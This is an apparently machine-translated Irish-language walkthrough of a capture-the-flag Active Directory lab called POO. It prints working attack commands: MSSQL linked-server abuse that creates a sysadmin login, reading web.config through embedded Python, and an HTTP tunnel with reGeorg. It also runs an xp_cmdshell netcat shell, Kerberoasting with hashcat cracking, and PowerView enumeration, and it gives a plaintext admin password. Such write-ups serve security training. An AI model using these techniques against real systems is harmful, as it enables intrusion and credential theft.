San Airteagal seo, déanfaimid anailís ar an sliocht ní hamháin meaisín, ach mionsaotharlann iomlán ón suíomh
Mar a dúradh sa tuairisc, tá POO deartha chun scileanna a thástáil ag gach céim d'ionsaithe i dtimpeallacht bheag Eolaire Gníomhach. Is é an sprioc ná comhréiteach a dhéanamh ar óstach atá ar fáil, pribhléidí a ardú, agus sa deireadh an fearann iomlán a chomhréiteach trí 5 bhratach a bhailiú sa phróiseas.
Déantar an nasc leis an saotharlann trí VPN. Moltar gan nascadh ó ríomhaire oibre nó ó ósta ina bhfuil sonraí tábhachtacha duit, de réir mar a théann tú isteach i líonra príobháideach le daoine a bhfuil eolas acu ar shlándáil faisnéise 🙂
faisnéis eagraíochtúil
Ionas gur féidir leat eolas a fháil faoi ailt nua, bogearraí agus faisnéis eile, chruthaigh mé
Cuirtear gach eolas ar fáil chun críocha oideachais amháin. Ní ghlacann údar an doiciméid seo freagracht ar bith as aon damáiste a dhéantar do dhuine ar bith mar thoradh ar úsáid an eolais agus na modhanna a fuarthas mar thoradh ar staidéar a dhéanamh ar an doiciméad seo.
Intro
Tá dhá mheaisín sa chríochchluiche seo agus tá 5 bhratach ann.
Tugtar tuairisc agus seoladh an óstaigh atá ar fáil freisin.
Ar aghaidh linn!
Bratach recon
Tá seoladh IP 10.13.38.11 ag an meaisín seo a chuireann mé le /etc/hosts.
10.13.38.11 poo.htb
Is é an chéad chéim ná calafoirt oscailte a scanadh. Ós rud é go dtógann sé go leor ama gach calafort a scanadh le nmap, déanfaidh mé é le masscan ar dtús. Déanaimid scanadh ar gach calafort TCP agus UDP ón gcomhéadan tun0 ag 500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Anois, chun faisnéis níos mionsonraithe a fháil faoi na seirbhísí a ritheann ar na calafoirt, reáchtáil scanadh leis an rogha -A.
nmap -A poo.htb -p80,1433
Mar sin, tá seirbhísí IIS agus MSSQL againn. Sa chás seo, gheobhaidh muid amach fíor-ainm DNS an fhearainn agus an ríomhaire. Ar an bhfreastalaí gréasáin, cuireann leathanach baile IIS fáilte roimh chách.
Déanaimis athrá ar na heolairí. Úsáidim gobuster le haghaidh seo. Sna paraiméadair sonraímid líon na sruthanna 128 (-t), URL (-u), foclóir (-w) agus síntí a bhfuil suim againn iontu (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Mar sin, tá fíordheimhniú HTTP againn don eolaire / admin, chomh maith leis an gcomhad stórála seirbhíse deisce .DS_Store atá ar fáil. Is comhaid iad .DS_Store a stórálann socruithe úsáideora le haghaidh fillteán, mar shampla liosta comhad, suíomh deilbhíní, íomhá cúlra roghnaithe. Féadfaidh comhad den sórt sin deireadh a chur in eolaire freastalaí gréasáin forbróirí gréasáin. Mar sin, faighimid faisnéis faoi ábhar an eolaire. Chun seo is féidir leat é a úsáid
python3 dsstore_crawler.py -i http://poo.htb/
Faighimid ábhar an eolaire. Is é an rud is suimiúla anseo an t-eolaire / dev, ónar féidir linn na foinsí agus na comhaid db a fheiceáil i dhá bhrainse. Ach is féidir linn na chéad 6 charachtar d'ainmneacha comhaid agus eolaire a úsáid má tá an tseirbhís i mbaol IIS ShortName. Is féidir leat an leochaileacht seo a sheiceáil trí úsáid a bhaint as
Agus aimsímid comhad téacs amháin a thosaíonn le "poo_co". Gan a fhios agam cad atá le déanamh ina dhiaidh sin, roghnaigh mé as foclóir na n-eolairí na focail go léir a thosaíonn le "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
Agus iterate le wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Agus faigh an focal ceart! Breathnaímid ar an gcomhad seo, sábháil na dintiúir (de réir an pharaiméadar DBNAME, is ó MSSQL iad).
Déanaimid an bhratach a thabhairt ar láimh, agus déanaimid dul chun cinn 20%.
Huh bratach
Nascaimid le MSSQL, úsáidim DBeaver.
Ní bhfaighimid aon rud suimiúil sa bhunachar sonraí seo, déanaimis Eagarthóir SQL a chruthú agus seiceáil cad iad na húsáideoirí.
SELECT name FROM master..syslogins;
Tá beirt úsáideoir againn. Déanaimis ár bpribhléidí a sheiceáil.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Dá bhrí sin, níl aon pribhléidí. A ligean ar a fheiceáil na freastalaithe nasctha, scríobh mé go mion faoin teicníc seo
SELECT * FROM master..sysservers;
Mar sin feicimid Freastalaí SQL eile. Déanaimis seiceáil ar fhorghníomhú na n-orduithe ar an bhfreastalaí seo le openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Agus is féidir linn fiú crann ceist a thógáil.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Is é fírinne an scéil, nuair a dhéanaimid iarratas chuig freastalaí nasctha, go ndéantar an t-iarratas i gcomhthéacs úsáideora eile! Feicfimid cén comhthéacs úsáideora atá á rith againn ar an bhfreastalaí nasctha.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Agus féachaimis anois cén comhthéacs a ndéantar an t-iarratas ón bhfreastalaí nasctha chuig an bhfreastalaí againn!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Mar sin, is comhthéacs DBO é a gcaithfidh gach pribhléid a bheith aige. Déanaimis na pribhléidí a sheiceáil i gcás iarratais ó fhreastalaí nasctha.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Mar a fheiceann tú, tá na pribhléidí go léir againn! Cruthaímid ár riarthóir mar seo. Ach ní ligeann siad dóibh trí openquery, a ligean ar é a dhéanamh trí EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
Agus anois déanaimid teagmháil le dintiúir an úsáideora nua, breathnaigh ar an mbunachar sonraí bratach nua.
Déanaimid an bhratach seo a thabhairt ar láimh agus dul níos faide.
Bratach rian droma
A ligean ar a fháil ar an bhlaosc ag baint úsáide as MSSQL, tá mé ag baint úsáide as mssqlclient as an bpacáiste impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Ní mór dúinn pasfhocail a fháil, agus is é an chéad rud a bhuaileamar cheana féin ná an suíomh. Mar sin, ní mór dúinn config freastalaí gréasáin (tá sé dodhéanta a chaitheamh bhlaosc áisiúil, is cosúil go bhfuil an balla dóiteáin ag obair).
Ach diúltaítear rochtain. Cé gur féidir linn an comhad a léamh ó MSSQL, ní mór dúinn ach fios a bheith againn cad iad na teangacha ríomhchlárúcháin atá cumraithe. Agus san eolaire MSSQL faighimid amach go bhfuil Python ann.
Ansin níl aon fhadhb ann an comhad web.config a léamh.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Agus na dintiúir aimsithe agat, téigh chuig /admin agus roghnaigh an bhratach.
bratach chos
Go deimhin, tá roinnt míchaoithiúlacht ann ó úsáid a bhaint as balla dóiteáin, ach ag féachaint trí na socruithe líonra, tugaimid faoi deara go n-úsáidtear prótacal IPv6 freisin!
Cuir an seoladh seo le /etc/hosts.
dead:babe::1001 poo6.htb
Déanaimis an t-óstach a scanadh arís, ach an uair seo thar IPv6.
Agus tá an tseirbhís WinRM ar fáil thar IPv6. Déanaimis nascadh leis na dintiúir aimsithe.
Tá bratach ar an deasc, tabhair leat é.
Bratach p00nte
Tar éis taiscéalaíochta ar an ósta le
setspn.exe -T intranet.poo -Q */*
Déanaimis an t-ordú a fhorghníomhú trí MSSQL.
Ar an mbealach seo, faigheann muid SPN na n-úsáideoirí p00_hr agus p00_adm, rud a chiallaíonn go bhfuil siad leochaileach d'ionsaí mar Kerberoasting. I mbeagán focal, is féidir linn a fháil ar an hashes a gcuid focal faire.
Ar dtús ní mór duit blaosc cobhsaí a fháil thar ceann an úsáideora MSSQL. Ach ós rud é go bhfuil rochtain teoranta againn, níl nasc againn leis an ósta ach trí chalafoirt 80 agus 1433. Ach is féidir trácht a thollánú trí chalafort 80! Chun seo a úsáid againn
Ach nuair a dhéanaimid iarracht rochtain a fháil air, faigheann muid earráid 404. Ciallaíonn sé seo nach ndéantar comhaid *.aspx a fhorghníomhú. Chun comhaid leis na síntí seo a reáchtáil, suiteáil ASP.NET 4.5 mar seo a leanas.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Agus anois, nuair a fhaigheann muid rochtain ar tunnel.aspx, faigheann muid an freagra go bhfuil gach rud réidh le dul.
A ligean ar tús a chur leis an chuid cliant den iarratas, a sealaíochta tráchta. Cuirfimid an trácht go léir ar aghaidh ó phort 5432 chuig an bhfreastalaí.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Agus bainimid úsáid as seachfhreastalaí chun trácht aon iarratais a sheoladh tríd ár seachfhreastalaí. Cuirfimid an seachfhreastalaí seo leis an gcomhad cumraíochta /etc/proxychains.conf.
Anois, déanaimis an clár a uaslódáil chuig an bhfreastalaí
Anois, trí MSSQL, seolann muid an éisteoir.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Agus nascaimid tríd ár seachfhreastalaí.
proxychains rlwrap nc poo.htb 4321
Agus a ligean ar a fháil ar an hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Ansin, ní mór duit a atriall thar na hashes. Ós rud é nach raibh foclóir sonraí pasfhocail ag rockyou, d'úsáid mé GACH foclóirí pasfhocail a cuireadh ar fáil i Seclists. Le haghaidh áirimh úsáidimid hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Agus aimsímid an dá fhocal faire, an chéad cheann i bhfoclóir dutch_passwordlist.txt, agus an dara ceann i Keyboard-Combinations.txt.
Agus mar sin tá trí úsáideoir againn, téann muid chuig an rialtóir fearainn. Faighimis a sheoladh amach ar dtús.
Go hiontach, tá seoladh IP an rialaitheora fearainn foghlamtha againn. Faighimid amach gach úsáideoir den fhearann, chomh maith le cé acu díobh atá ina riarthóir. Chun an script a íoslódáil chun faisnéis a fháil PowerView.ps1. Ansin déanfaimid nascadh ag baint úsáide as evil-winrm, ag sonrú an eolaire leis an script sa pharaiméadar -s. Agus ansin díreach luchtú an script PowerView.
Anois tá rochtain againn ar a chuid feidhmeanna go léir. Breathnaíonn an t-úsáideoir p00_adm mar úsáideoir faoi phribhléid, mar sin oibreoimid ina chomhthéacs. Cruthaímid oibiacht PSCredential don úsáideoir seo.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Anois déanfar gach ordú Powershell ina sonraímid Creds a fhorghníomhú thar ceann p00_adm. Taispeánaimis liosta úsáideoirí agus an tréith AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Agus mar sin, tá ár n-úsáideoir faoi phribhléid i ndáiríre. Féachaimis cad iad na grúpaí lena mbaineann sé.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Deimhnímid ar deireadh gur riarthóir fearainn é an t-úsáideoir. Tugann sé seo an ceart dó logáil isteach go cianda ar an rialtóir fearainn. Déanaimis iarracht logáil isteach le WinRM ag baint úsáide as ár dtollán. Bhí mearbhall orm faoi na hearráidí a d'eisigh reGeorg agus é ag baint úsáide as evil-winrm.
Ansin úsáidimid ceann eile níos éasca,
Déanaimid iarracht nascadh, agus táimid sa chóras.
Ach níl aon bhratach ann. Ansin féach ar an úsáideoir agus seiceáil na deasc.
Ag mr3ks feicimid an bhratach agus tá an tsaotharlann 100% críochnaithe.
Sin é an méid. Mar aiseolas, déan trácht ar cibé ar fhoghlaim tú rud éigin nua ón alt seo agus cibé an raibh sé úsáideach duit.
Is féidir leat bheith linn ag
Foinse: will.com